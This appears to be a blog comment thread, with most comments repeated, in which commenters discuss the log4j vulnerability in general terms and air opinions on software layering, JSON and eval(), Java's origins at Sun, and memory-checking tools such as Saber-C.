Bruce@#2: Marcus, what can you tell us about the log4j vulnerability?
If you’ve got the apache logging system (log4j) installed, you need to disable it. It sounds like it’s a design disaster and my prediction is that there will be more bugs found in it.
The attack, so far as I can tell, is a category of input validation flaw – the library can be tricked to going to an arbitrary site and downloading a chunk of code, which is then run. The tricking part is done via a constructed URL called against a system with the apache logging system on it – the system pulls down a piece of arbitrary data in an LDAP request triggered by the constructed URL, which is then passed into the system in a way so that it’s executed with server privileges.
That sort of design flaw is a result of over-complex layered software depending on over-complex lower layers. That’s nothing surprising, and people who pay attention to software and software security have been warning for decades that layered badly-designed over-complex software is going to become an endless pit of security vulnerabilities. I saw some comment in the press that it’s an open source software issue, but I don’t agree with that – it’s a software layering/design problem, and that it’s open source exacerbates it because attackers can review the source and look for flaws. But commercial software is similarly full of such flaws.
Part of why I was so happy to get out of the security field is because, after decades of trying to make things better, I was finally tired of watching software “engineers” making the problem worse as fast as they could, far faster than security practitioners could get word out that they need to be careful with what they are doing. There’s just too much emphasis on throwing “features” over the fence and not enough on good design and implementation. This bug, and the many that are constantly being found, are a manifestation not of a “flaw underpinning Apache” (as some have put it) but more like a “flaw underpinning how internet software is designed, implemented, and deployed.” It’s an endless pit of shit and all that’s going to be discovered when people dig through it is: more shit.
One of the worst ideas in computer security, lately, is JSON and “restful” interfaces. It’s basically the worst possible way to solve the pickling/unpickling problem for data – instead of writing a file with some kind of data structure that you can reconstruct, you write a file that is executable declarations of a data structure, and you can then reconstruct the data structure by executing the file. In order for that to work safely, the programmer needs to be aware that he’s importing file data as executable runtime and the file may contain commands such as spawning other processes or running system calls to change file ownerships, open network connections – all kinds of nasty, ugly things. Whoever came up with that idea was a lazy idiot, who decided to ignore 50 years of human experience with writing software, and decided that something incredibly dumb was clever. Or something. The current state of software is absolutely chock full of that kind of sloppy thinking and it’s extended to “devops” – the idea that developers, who generally suck at developing, should also do system administration and operations which are a totally different art-form and which developers suck at even more.
Of course “not all developers” – there are a few great ones out there who are absolutely great at everything. Too bad they’re not writing all the open source code that’s being used to operate critical systems.
billseymoursays
I particularly dislike most Java libraries/frameworks; and log4j is one of them. These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
(Sorry to contribute to the derailing of your post; but I wanted to blow off some steam.)
billseymour@#5: These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
Do you think they put that much thought into it?
To be fair, it’s not as though some over-thought protocols and frameworks haven’t been equally offer. X.509, SNMP, XML, MIME, etc. I remember when MTR was pushing SNMP and we were all laughing about how “simple” it was and, seriously, WTF was the message structure so ridiculous, for? Then there was the whole MIME-encoding thing: was the message a bunch of blocks inside the encoding, or was the encoding blocks inside a message? I know: let’s do both. WTF. WTF. WTF. Let me be frank: a lot of important software architectures were rammed through standards committees because of the ego issues of their authors, or other really bad reasons – seldom because they were actually good.
There is a story I heard from someone highly placed at Sun Microsystems (SVP level) that Jim Gosling was basically so annoying with his EMACS thing that he was pretty much left to his own devices and ignored – and he decided to hack together a programming language for small device control; toaster ovens, elevators, things like that. The internet started to happen and someone thought a web programming language would have some value, and security was a concern, so someone asked around Sun and Gosling said, “sure, use my language!” Since security was a concern, some marketing weasel asked “is it secure” (whatever that is) and Gosling said, “sure! of course!” and someone in the marketing department called it “Java” and made a cool logo for it. It never was designed to be a restricted runtime or a safe programming environment and it didn’t even have a debugger (mandatory for commercial code). It was a perfect storm of ego and marketing bullshit and, inexplicably, a lot of the banking sector and several large businesses decided to standardize on Java because they trusted that Sun wasn’t being stupid, which, of course, they were. At the time I was on the speaking circuit and would ask for shows of hands for companies that were using Java for app development, and then I’d say, “have you ever considered Sun’s pathetic history of publishing and maintaining software and compilers?” Nobody seemed to remember the Sun C compiler (pretty good but devastated by gcc, which was written with the help of a lot of people at Sun ah hahahahaha, good times.
The industry standardizes on really sketchy stuff because of ego and marketing and then it winds up in production where it lingers forever like the smell of a dead woodchuck under your porch.
[All the stuff about URLs not being allowed from other than the site where the code came from, was last-minute kludgery to make it look like it had a security model. At the time, I remember serious people were saying a programming language with a data tainting model would be good for web stuff, and a system-wide lockout for system calls except through a container system, etc. But because of the way it all happened, nobody had time to actually think about stuff, they just went ‘well, Jim’s a great programmer, let’s ship it!’ I mean, Gosling is a great programmer, but he was not exactly notorious for writing products and EMACS damn sure wasn’t anything anyone would point at as commercial-ready code.]
cvoinescusays
Marcus, I can’t comment on RESTful interfaces, because I did not have to deal with them much — other than maybe to say that making them stateless solves some problems and introduces others, and makes other parts of the system stateful, often in an ad-hoc, awkward way that’s less well understood and harder to review.
But you’re probably wrong about JSON. Sure, it originated as some lazy dude saying “Why do I need to parse a config file, when I have a perfectly fine interpreted language here with a way to execute code to calculate the value of an expression? Let’s use that”. But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
cvoinescu@#7: But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
Well, it’s on us, really.
The end user of software cannot fairly be expected to study the implementation of each piece of code they plan to put in production; they ought to be able to assume (!) that it was developed with care and understanding – but when that’s not the case, then it suddenly invokes unexpected costs, downtime or getting hacked. That applies to commercial as well as open source – our ability to estimate the true cost of software is affected by follow-on costs to a degree that nobody seems to take into account.
Anyhow, yeah, we managed to get all those guys to stop using eval() to unpickle JSON, but that means that the actual design’s value, which was to eval() JSON, is removed. thing=thing\newline turns out to be just as good and it’s a lot easier. Of course it could all be turned into a single function call to a standard pickle/unpickle routine, anyway, so in that sense it may as well be XML. Ughhh.
I guess I’m just doing “you kids get offa my lawn” in this comment. In the course of my life I have written several hundred delimited record/pickle/unpickle routines and it’s just not a hard enough thing that it requires a big solution. You just walk your data-structures, write tombstones and IDs, store an index if you need one, etc. It’s a basic programming thing and you can’t claim to know how to program a computer unless you know how to store memory to/from a file.
There is another weird thing a lot of programmers don’t seem to understand: many ordinary-looking functions (such as an LDAP authentication request or a DNS lookup) are remote procedure calls. Even writing something to a file from someplace else then later reconstituting it and acting upon it is a remote procedure call, it’s just delayed. Merely consuming the results as input is not enough, you need to carefully validate the input.
The trusted O/S guys would tell us (and they’re mostly right…) that our programming languages, especially now that networking is part of the mix, need a “taint” data model wherein some data is not treated as plain old memory until it has been checked out and some kind of blessing operation is performed on it. In my wild dreams that would be implemented in the virtual machine with a separate memory region, and the kernel would also enforce controls; i.e.: you cannot do a system call chain that ends with exec() on data from that region – and the very least you cannot put memory from that region on the call stack! It could be implemented in software only as a set of library functions (I did that in some stuff I wrote, back in 1990) but the problem with libraries is getting programmers to adhere to them. It’s kind of embarrassing to admit this, but I figured this problem out when I was trying to convert BASIC strings into C strings in some code, and realized that having a parallel memory system was actually a pretty good way of maintaining isolation.
There was an amazing tool called Saber-C (later: CodeCenter) which was a C interpiler/development environment. It was like god’s debugger: you could call functions directly, examine memory structures, etc., but it didn’t use C memory allocation – each region of memory was tracked and allocated using a separate system.Think for a second how amazingly awesome that is! You got a rundown of all memory that was allocated but never freed, tracked by the line of code that did the allocation, you got breaks when memory was mis-read – if you put an int in something you got an error if you read it back as a char, you got warnings when you went off the end of an array, or accessed something you had allocated after you freed it, It caught so many errors it was not even funny. Unfortunately, it cost $10,000 (a pittance for a software company) and had a learning curve – but then C++ came along, with its exquisitely bad handling of the notion of “variables”… (I used Cfront1.0 and looked at the generated code; basically C++ runtime treated all memory regions as dumpsters that it can put anything into or out of and there was no checking; it was all cast to void * and converted back, ugh.
dangerousbeanssays
some people like getting their kids ears pierced. not really ethical IMO, but holy kids are a thing
geoffbsays
Not to publicize anything, but if you want the s** scared out of you, go look at snyk over say 2-3 days. As in https://security.snyk.io/page/1?type=npm talk about layer upon layer of layer of rot.
Reginald Selkirk says
Are gingerbread men cannibal propaganda?
Bruce says
Marcus, what can you tell us about the log4j vulnerability?
Marcus Ranum says
Bruce@#2:
Marcus, what can you tell us about the log4j vulnerability?
If you’ve got the apache logging system (log4j) installed, you need to disable it. It sounds like it’s a design disaster and my prediction is that there will be more bugs found in it.
The attack, so far as I can tell, is a category of input validation flaw – the library can be tricked to going to an arbitrary site and downloading a chunk of code, which is then run. The tricking part is done via a constructed URL called against a system with the apache logging system on it – the system pulls down a piece of arbitrary data in an LDAP request triggered by the constructed URL, which is then passed into the system in a way so that it’s executed with server privileges.
That sort of design flaw is a result of over-complex layered software depending on over-complex lower layers. That’s nothing surprising, and people who pay attention to software and software security have been warning for decades that layered badly-designed over-complex software is going to become an endless pit of security vulnerabilities. I saw some comment in the press that it’s an open source software issue, but I don’t agree with that – it’s a software layering/design problem, and that it’s open source exacerbates it because attackers can review the source and look for flaws. But commercial software is similarly full of such flaws.
Part of why I was so happy to get out of the security field is because, after decades of trying to make things better, I was finally tired of watching software “engineers” making the problem worse as fast as they could, far faster than security practitioners could get word out that they need to be careful with what they are doing. There’s just too much emphasis on throwing “features” over the fence and not enough on good design and implementation. This bug, and the many that are constantly being found, are a manifestation not of a “flaw underpinning Apache” (as some have put it) but more like a “flaw underpinning how internet software is designed, implemented, and deployed.” It’s an endless pit of shit and all that’s going to be discovered when people dig through it is: more shit.
Marcus Ranum says
One of the worst ideas in computer security, lately, is JSON and “restful” interfaces. It’s basically the worst possible way to solve the pickling/unpickling problem for data – instead of writing a file with some kind of data structure that you can reconstruct, you write a file that is executable declarations of a data structure, and you can then reconstruct the data structure by executing the file. In order for that to work safely, the programmer needs to be aware that he’s importing file data as executable runtime and the file may contain commands such as spawning other processes or running system calls to change file ownerships, open network connections – all kinds of nasty, ugly things. Whoever came up with that idea was a lazy idiot, who decided to ignore 50 years of human experience with writing software, and decided that something incredibly dumb was clever. Or something. The current state of software is absolutely chock full of that kind of sloppy thinking and it’s extended to “devops” – the idea that developers, who generally suck at developing, should also do system administration and operations which are a totally different art-form and which developers suck at even more.
Of course “not all developers” – there are a few great ones out there who are absolutely great at everything. Too bad they’re not writing all the open source code that’s being used to operate critical systems.
billseymour says
I particularly dislike most Java libraries/frameworks; and log4j is one of them. These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
(Sorry to contribute to the derailing of your post; but I wanted to blow off some steam.)
Marcus Ranum says
billseymour@#5:
These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
Do you think they put that much thought into it?
To be fair, it’s not as though some over-thought protocols and frameworks haven’t been equally offer. X.509, SNMP, XML, MIME, etc. I remember when MTR was pushing SNMP and we were all laughing about how “simple” it was and, seriously, WTF was the message structure so ridiculous, for? Then there was the whole MIME-encoding thing: was the message a bunch of blocks inside the encoding, or was the encoding blocks inside a message? I know: let’s do both. WTF. WTF. WTF. Let me be frank: a lot of important software architectures were rammed through standards committees because of the ego issues of their authors, or other really bad reasons – seldom because they were actually good.
There is a story I heard from someone highly placed at Sun Microsystems (SVP level) that Jim Gosling was basically so annoying with his EMACS thing that he was pretty much left to his own devices and ignored – and he decided to hack together a programming language for small device control; toaster ovens, elevators, things like that. The internet started to happen and someone thought a web programming language would have some value, and security was a concern, so someone asked around Sun and Gosling said, “sure, use my language!” Since security was a concern, some marketing weasel asked “is it secure” (whatever that is) and Gosling said, “sure! of course!” and someone in the marketing department called it “Java” and made a cool logo for it. It never was designed to be a restricted runtime or a safe programming environment and it didn’t even have a debugger (mandatory for commercial code). It was a perfect storm of ego and marketing bullshit and, inexplicably, a lot of the banking sector and several large businesses decided to standardize on Java because they trusted that Sun wasn’t being stupid, which, of course, they were. At the time I was on the speaking circuit and would ask for shows of hands for companies that were using Java for app development, and then I’d say, “have you ever considered Sun’s pathetic history of publishing and maintaining software and compilers?” Nobody seemed to remember the Sun C compiler (pretty good but devastated by gcc, which was written with the help of a lot of people at Sun ah hahahahaha, good times.
The industry standardizes on really sketchy stuff because of ego and marketing and then it winds up in production where it lingers forever like the smell of a dead woodchuck under your porch.
[All the stuff about URLs not being allowed from other than the site where the code came from, was last-minute kludgery to make it look like it had a security model. At the time, I remember serious people were saying a programming language with a data tainting model would be good for web stuff, and a system-wide lockout for system calls except through a container system, etc. But because of the way it all happened, nobody had time to actually think about stuff, they just went ‘well, Jim’s a great programmer, let’s ship it!’ I mean, Gosling is a great programmer, but he was not exactly notorious for writing products and EMACS damn sure wasn’t anything anyone would point at as commercial-ready code.]
cvoinescu says
Marcus, I can’t comment on RESTful interfaces, because I did not have to deal with them much — other than maybe to say that making them stateless solves some problems and introduces others, and makes other parts of the system stateful, often in an ad-hoc, awkward way that’s less well understood and harder to review.
But you’re probably wrong about JSON. Sure, it originated as some lazy dude saying “Why do I need to parse a config file, when I have a perfectly fine interpreted language here with a way to execute code to calculate the value of an expression? Let’s use that”. But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
Marcus Ranum says
cvoinescu@#7:
But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
Well, it’s on us, really.
The end user of software cannot fairly be expected to study the implementation of each piece of code they plan to put in production; they ought to be able to assume (!) that it was developed with care and understanding – but when that’s not the case, then it suddenly invokes unexpected costs, downtime or getting hacked. That applies to commercial as well as open source – our ability to estimate the true cost of software is affected by follow-on costs to a degree that nobody seems to take into account.
Anyhow, yeah, we managed to get all those guys to stop using eval() to unpickle JSON, but that means that the actual design’s value, which was to eval() JSON, is removed. thing=thing\newline turns out to be just as good and it’s a lot easier. Of course it could all be turned into a single function call to a standard pickle/unpickle routine, anyway, so in that sense it may as well be XML. Ughhh.
I guess I’m just doing “you kids get offa my lawn” in this comment. In the course of my life I have written several hundred delimited record/pickle/unpickle routines and it’s just not a hard enough thing that it requires a big solution. You just walk your data-structures, write tombstones and IDs, store an index if you need one, etc. It’s a basic programming thing and you can’t claim to know how to program a computer unless you know how to store memory to/from a file.
There is another weird thing a lot of programmers don’t seem to understand: many ordinary-looking functions (such as an LDAP authentication request or a DNS lookup) are remote procedure calls. Even writing something to a file from someplace else then later reconstituting it and acting upon it is a remote procedure call, it’s just delayed. Merely consuming the results as input is not enough, you need to carefully validate the input.
The trusted O/S guys would tell us (and they’re mostly right…) that our programming languages, especially now that networking is part of the mix, need a “taint” data model wherein some data is not treated as plain old memory until it has been checked out and some kind of blessing operation is performed on it. In my wild dreams that would be implemented in the virtual machine with a separate memory region, and the kernel would also enforce controls; i.e.: you cannot do a system call chain that ends with exec() on data from that region – and the very least you cannot put memory from that region on the call stack! It could be implemented in software only as a set of library functions (I did that in some stuff I wrote, back in 1990) but the problem with libraries is getting programmers to adhere to them. It’s kind of embarrassing to admit this, but I figured this problem out when I was trying to convert BASIC strings into C strings in some code, and realized that having a parallel memory system was actually a pretty good way of maintaining isolation.
There was an amazing tool called Saber-C (later: CodeCenter) which was a C interpiler/development environment. It was like god’s debugger: you could call functions directly, examine memory structures, etc., but it didn’t use C memory allocation – each region of memory was tracked and allocated using a separate system.Think for a second how amazingly awesome that is! You got a rundown of all memory that was allocated but never freed, tracked by the line of code that did the allocation, you got breaks when memory was mis-read – if you put an int in something you got an error if you read it back as a char, you got warnings when you went off the end of an array, or accessed something you had allocated after you freed it, It caught so many errors it was not even funny. Unfortunately, it cost $10,000 (a pittance for a software company) and had a learning curve – but then C++ came along, with its exquisitely bad handling of the notion of “variables”… (I used Cfront1.0 and looked at the generated code; basically C++ runtime treated all memory regions as dumpsters that it can put anything into or out of and there was no checking; it was all cast to void * and converted back, ugh.
dangerousbeans says
some people like getting their kids ears pierced. not really ethical IMO, but holy kids are a thing
geoffb says
Not to publicize anything, but if you want the s** scared out of you, go look at snyk over say 2-3 days. As in https://security.snyk.io/page/1?type=npm talk about layer upon layer of layer of rot.
Marcus Ranum says
geoffb@#10:
Not to publicize anything, but if you want the s** scared out of you, go look at snyk over say 2-3 days.
Damn.
I used to wonder aloud how anyone could look at MS-DOS and say “this is the future of production systems” but I was an optimist back then.